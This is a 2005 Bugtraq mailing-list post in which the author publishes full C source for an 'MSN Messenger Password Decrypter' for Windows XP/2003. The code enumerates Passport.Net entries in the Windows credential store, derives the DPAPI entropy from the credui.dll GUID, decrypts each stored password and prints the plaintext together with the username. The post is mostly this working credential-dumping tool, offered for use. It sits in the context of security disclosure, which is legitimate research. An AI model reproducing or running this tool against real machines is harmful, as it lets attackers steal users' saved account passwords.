[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050817182747.44886.qmail@web8509.mail.in.yahoo.com>
Date: Wed, 17 Aug 2005 19:27:47 +0100 (BST)
From: ViPeR <viper31337@...oo.co.in>
To: bugtraq@...urityfocus.com
Subject: MSN Messenger Password Decrypter for WinXP/2003
MSN Messenger uses Windows Credential UI [credui.dll]
on WinXP/2003. Password-Storage mechanism differs in
these OSes so, the code posted by tombkeeper
[http://xfocus.net/articles/200408/726.html] doesn't
seem to work anymore on my OS atleast. Also, a
'entropy' value has been thrown, which is based on
credui.dll GUID.
So, here is the code that fullfils the same purpose -
but surely works on my OS [WinXP SP2] :)
/--- Start-Code --/
/*
* MSN Messenger Password Decrypter for Windows XP &
2003
* (Compiled-VC++ 7.0, tested on WinXP SP2, MSN
Messenger 7.0)
* - Gregory R. Panakkal
* http://www.crapware.tk/
* http://www.infogreg.com/
*/
#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>
#pragma comment(lib, "Crypt32.lib")
//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK /
LCC-Win32 Includes]
typedef struct _CREDENTIAL_ATTRIBUTEA {
LPSTR Keyword;
DWORD Flags;
DWORD ValueSize;
LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;
typedef struct _CREDENTIALA {
DWORD Flags;
DWORD Type;
LPSTR TargetName;
LPSTR Comment;
FILETIME LastWritten;
DWORD CredentialBlobSize;
LPBYTE CredentialBlob;
DWORD Persist;
DWORD AttributeCount;
PCREDENTIAL_ATTRIBUTEA Attributes;
LPSTR TargetAlias;
LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;
typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;
////////////////////////////////////////////////////////////////////
typedef BOOL (WINAPI *typeCredEnumerateA)(LPCTSTR,
DWORD, DWORD *, PCREDENTIALA **);
typedef BOOL (WINAPI *typeCredReadA)(LPCTSTR, DWORD,
DWORD, PCREDENTIALA *);
typedef VOID (WINAPI *typeCredFree)(PVOID);
typeCredEnumerateA pfCredEnumerateA;
typeCredReadA pfCredReadA;
typeCredFree pfCredFree;
////////////////////////////////////////////////////////////////////
void showBanner()
{
printf("MSN Messenger Password Decrypter for
Windows XP/2003\n");
printf(" - Gregory R. Panakkal,
http://www.infogreg.com \n\n");
}
////////////////////////////////////////////////////////////////////
int main()
{
PCREDENTIAL *CredentialCollection = NULL;
DATA_BLOB blobCrypt, blobPlainText, blobEntropy;
//used for filling up blobEntropy
char szEntropyStringSeed[37] =
"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; //credui.dll
short int EntropyData[37];
short int tmp;
HMODULE hDLL;
DWORD Count, i;
showBanner();
//Locate CredEnumerate, CredRead, CredFree from
advapi32.dll
if( hDLL = LoadLibrary("advapi32.dll") )
{
pfCredEnumerateA =
(typeCredEnumerateA)GetProcAddress(hDLL,
"CredEnumerateA");
pfCredReadA =
(typeCredReadA)GetProcAddress(hDLL, "CredReadA");
pfCredFree =
(typeCredFree)GetProcAddress(hDLL, "CredFree");
if( pfCredEnumerateA == NULL||
pfCredReadA == NULL ||
pfCredFree == NULL )
{
printf("error!\n");
return -1;
}
}
//Get an array of 'credential', satisfying the
filter
pfCredEnumerateA("Passport.Net\\*", 0, &Count,
&CredentialCollection);
if( Count ) //usually this value is only 1
{
//Calculate Entropy Data
for(i=0; i<37; i++) //
strlen(szEntropyStringSeed) = 37
{
tmp = (short int)szEntropyStringSeed[i];
tmp <<= 2;
EntropyData[i] = tmp;
}
for(i=0; i<Count; i++)
{
blobEntropy.pbData = (BYTE *)&EntropyData;
blobEntropy.cbData = 74;
//sizeof(EntropyData)
blobCrypt.pbData =
CredentialCollection[i]->CredentialBlob;
blobCrypt.cbData =
CredentialCollection[i]->CredentialBlobSize;
CryptUnprotectData(&blobCrypt, NULL,
&blobEntropy, NULL, NULL, 1, &blobPlainText);
printf("Username : %s\n",
CredentialCollection[i]->UserName);
printf("Password : %ls\n\n",
blobPlainText.pbData);
}
}
pfCredFree(CredentialCollection);
}
/--- End-Code --/
URL :
http://www.infogreg.com/source-code/gpl/msn-messenger-password-decrypter-for-windows-xp-and-2003.html
rgds,
Gregory R. Panakkal
____________________________________________________
Send a rakhi to your brother, buy gifts and win attractive prizes. Log on to http://in.promos.yahoo.com/rakhi/index.html
Powered by blists - more mailing lists